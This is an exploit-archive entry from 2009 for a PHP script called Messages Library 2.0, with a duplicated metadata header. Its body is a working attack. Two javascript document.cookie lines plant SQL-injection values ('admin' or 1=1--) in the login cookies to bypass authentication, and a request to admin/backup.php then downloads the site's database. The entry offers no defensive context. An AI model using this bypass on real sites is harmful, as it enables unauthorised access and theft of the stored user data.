Messages Library 2.0 - Insecure Cookie Handling
| EKU-ID: 16851 | CVE: | OSVDB-ID: |
| Author: Stack | Published: 2009-07-01 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 16851 | CVE: | OSVDB-ID: |
| Author: Stack | Published: 2009-07-01 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Messages Library 2.0 <= Arbitrary Database Download Vulnerability ######################################## #[*] Founded & Exploited by : Stack ######################################## Bypass with javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/"; javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/"; After Exec http://localhost/sms/admin/backup.php and you got the database download # milw0rm.com [2009-07-01]